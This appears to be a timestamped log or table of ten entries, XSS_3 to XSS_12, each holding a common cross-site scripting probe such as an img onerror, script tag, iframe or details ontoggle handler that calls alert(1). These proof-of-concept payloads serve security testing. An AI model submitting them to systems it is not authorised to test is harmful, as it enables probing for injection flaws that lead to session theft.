| XSS_12: 2026-06-26 13:45:41 |
|
| <img src=x onerror=alert(1)> |
| XSS_11: 2026-06-26 13:45:39 |
|
| <script>alert(1)</script> |
| XSS_10: 2026-06-26 13:45:36 |
|
| <div onmouseover=alert(1)>hover me</div> |
| XSS_9: 2026-06-26 13:45:34 |
|
| <form action=javascript:alert(1)><button>click</button></form> |
| XSS_8: 2026-06-26 13:45:31 |
|
| <iframe src=javascript:alert(1)> |
| XSS_7: 2026-06-26 13:45:29 |
|
| <marquee onstart=alert(1)>test</marquee> |
| XSS_6: 2026-06-26 13:45:27 |
|
| <input autofocus onfocus=alert(1)> |
| XSS_5: 2026-06-26 13:45:24 |
|
| <a href=javascript:alert(1)>click</a> |
| XSS_4: 2026-06-26 13:45:22 |
|
| <details open ontoggle=alert(1)> |
| XSS_3: 2026-06-26 13:45:19 |
|
| <body onload=alert(1)> |